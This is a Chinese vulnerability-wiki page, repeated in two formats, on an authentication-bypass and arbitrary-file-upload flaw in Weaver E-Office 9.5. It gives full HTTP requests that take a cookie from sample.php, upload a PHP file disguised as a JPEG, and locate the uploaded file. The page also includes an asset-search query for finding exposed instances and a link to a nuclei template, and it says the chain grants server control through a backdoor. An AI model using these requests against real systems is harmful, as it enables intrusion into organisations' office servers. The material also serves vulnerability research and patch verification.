fofamini-wiki

登录白背景

源码

泛微E-Office file-upload任意文件上传漏洞

一、漏洞简介

泛微E-Office是一款标准化的协同 OA 办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office 存在权限绕过漏洞（测试页面sample.php），攻击者可以通过此页面获取有效cookie绕过权限校验，利用后台文件上传漏洞上传后门文件获取服务器控制权限。

二、影响版本

泛微 E-Office 9.5

三、资产测绘

hunterapp.name="泛微 e-office OA"
特征

四、漏洞复现

获取有效cookie

GET /sample.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

利用上一步获取到的cookie上传文件

POST /inc/ext/upload/file-upload.php HTTP/1.1
Host: {hostname}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc3kzQm4dBRhin8Dk
Cookie: {cookie}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
 
------WebKitFormBoundaryc3kzQm4dBRhin8Dk
Content-Disposition: form-data; name="userfile"; filename="1.php4"
Content-Type: image/jpeg
 
<?php phpinfo();?>
------WebKitFormBoundaryc3kzQm4dBRhin8Dk--

通过获取到的cookie，获取上传文件位置

GET /general/address/view/get-images.php?alb_id=11&start=0&limit=1 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Cookie: {cookie}
Accept-Encoding: gzip

/attachment/album/52778860/2.php4

nuclei脚本
泛微-eoffice-sample-任意文件上传.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/vc63xxbl1nvag13g

# 泛微E-Office file-upload任意文件上传漏洞

# 一、漏洞简介
泛微E-Office是一款标准化的协同 OA 办公软件，泛微协同办公产品系列成员之一,实行通用化产品设计，充分贴合企业管理需求，本着简洁易用、高效智能的原则，为企业快速打造移动化、无纸化、数字化的办公平台。泛微e-office 存在权限绕过漏洞（测试页面sample.php），攻击者可以通过此页面获取有效cookie绕过权限校验，利用后台文件上传漏洞上传后门文件获取服务器控制权限。

# 二、影响版本

- 泛微 E-Office 9.5

# 三、资产测绘

- hunter`app.name="泛微 e-office OA"`
- 特征

![image.png](./img/bBxldte-AWSPuOCI/1699626155208-edbd078f-2fee-4a15-ae03-662e19b14f2e-982203.png)

# 四、漏洞复现

1. 获取有效cookie
```
GET /sample.php HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
```
![image.png](./img/bBxldte-AWSPuOCI/1702437960668-5128c282-085e-4f2f-b966-8ef776edee52-776934.png)

2. 利用上一步获取到的cookie上传文件
```
POST /inc/ext/upload/file-upload.php HTTP/1.1
Host: {hostname}
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc3kzQm4dBRhin8Dk
Cookie: {cookie}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
 
------WebKitFormBoundaryc3kzQm4dBRhin8Dk
Content-Disposition: form-data; name="userfile"; filename="1.php4"
Content-Type: image/jpeg
 
<?php phpinfo();?>
------WebKitFormBoundaryc3kzQm4dBRhin8Dk--
```
![image.png](./img/bBxldte-AWSPuOCI/1702438063542-fe9415d8-b317-41fa-8cf7-fe4c9a41a7d5-088903.png)

3. 通过获取到的cookie，获取上传文件位置
```
GET /general/address/view/get-images.php?alb_id=11&start=0&limit=1 HTTP/1.1
Host: {hostname}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Cookie: {cookie}
Accept-Encoding: gzip
```
![image.png](./img/bBxldte-AWSPuOCI/1702438138392-a5fa8651-7519-4eec-a84a-159485a816fd-209716.png)
```
/attachment/album/52778860/2.php4
```
![image.png](./img/bBxldte-AWSPuOCI/1702438167046-ceeced64-8599-4c77-b5c4-530b04c0f338-535292.png)
nuclei脚本
[泛微-eoffice-sample-任意文件上传.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1709219614125-bff49b95-5053-4964-bca3-02101fdda990.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1709219614125-bff49b95-5053-4964-bca3-02101fdda990.yaml%22%2C%22name%22%3A%22%E6%B3%9B%E5%BE%AE-eoffice-sample-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0.yaml%22%2C%22size%22%3A2322%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22ua62884af-7b4c-4082-9f88-de6ba855dc1%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22id%22%3A%22u5efdfb89%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/vc63xxbl1nvag13g>